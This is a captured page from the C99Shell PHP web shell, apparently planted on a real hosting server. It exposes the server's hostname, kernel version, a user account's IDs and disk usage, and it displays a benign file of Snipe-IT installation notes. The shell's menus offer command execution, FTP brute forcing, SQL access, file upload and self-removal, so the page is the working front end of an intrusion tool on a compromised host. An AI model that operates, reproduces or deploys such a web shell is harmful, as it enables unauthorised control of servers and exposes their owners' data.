!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/snipeit/   drwxr-xr-x
Free 293.85 GB of 429.69 GB (68.39%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     notes.txt (1.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
1. Install Composer and create zip for package use "php composer.phar install --no-dev" command to install.
2. Copy .env.example to .env and fill the database details DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, DB_PREFIX and APP_URL
3. Run php artisan key:generate to generate APP_KEY in .env file.
4. Run "php artisan migrate" from command line before creating tables step in manual installation.(confirmed with vendor)
5. Add the following line to the .htaccess file in the root folder :
<IfModule mod_alias.c>
RedirectMatch 301 ^[[relativeurl]]/$ [[softurl]]/public
</IfModule>
6. PHP REQUIREMENT LINK: https://snipe-it.readme.io/docs/requirements
7. We have not added upgrade yet because script provides upgrade/migrate through composer only. https://snipe-it.readme.io/docs/upgrading
check everytime and add if possible
8. delete inserts of oauth_clients and oauth_personal_access_clients tables. It creates after login. (check in every version)
9. Keep the LIVEWIRE_URL_PREFIX=[[relativeurl]]/public parameter as it is required to load the livewire js files.
10. Delete bootstrap/cache/packages.php and bootstrap/cache/services.php files it gets generated on login.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0961 ]--